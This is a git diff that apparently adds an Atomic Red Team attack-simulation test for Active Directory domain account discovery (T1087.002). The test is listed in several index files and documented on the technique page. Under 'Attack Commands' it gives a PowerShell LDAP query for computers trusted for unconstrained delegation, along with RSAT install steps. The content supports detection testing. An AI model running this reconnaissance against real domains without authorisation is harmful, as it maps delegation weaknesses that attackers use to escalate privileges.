a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -438,6 +438,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins, discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt +discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index d1a78b05..a9ae5a7c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1121,6 +1121,7 @@ - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows] - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows] - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows] + - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows] - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows] - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d1f5864e..5b6382dc 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -820,6 +820,7 @@ - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows] - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows] - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows] + - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows] - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md) - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows] - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 7db65eb5..69c30c6a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -49429,6 +49429,49 @@ discovery: ' name: command_prompt + - name: Enumerate Active Directory for Unconstrained Delegation + auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b + description: | + Attackers may attempt to query for computer objects with the UserAccountControl property + 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set + More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce + Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + supported_platforms: + - windows + input_arguments: + domain: + description: Domain FQDN + type: String + default: contoso.com + uac_prop: + description: UAC Property to search + type: String + default: 524288 + dependencies: + - description: 'PowerShell ActiveDirectory Module must be installed + +' + prereq_command: | + Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 + } + Catch { + exit 1 + } + get_prereq_command: | + if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online + } else { + Install-WindowsFeature RSAT-AD-PowerShell + } + executor: + name: powershell + elevation_required: false + command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' + -Server #{domain} + +' T1069.002: technique: external_references: diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index 2b80197a..f39060c1 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -24,6 +24,8 @@ Commands such as net user /domain and net group /domain @@ -344,4 +346,59 @@ net user administrator /domain +
+
+ +## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation +Attackers may attempt to query for computer objects with the UserAccountControl property +'TRUSTED_FOR_DELEGATION' (0x80000;524288) set +More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce +Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| domain | Domain FQDN | String | contoso.com| +| uac_prop | UAC Property to search | String | 524288| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: PowerShell ActiveDirectory Module must be installed +##### Check Prereq Commands: +```powershell +Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 +} +Catch { + exit 1 +} +``` +##### Get Prereq Commands: +```powershell +if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online +} else { + Install-WindowsFeature RSAT-AD-PowerShell +} +``` + + + +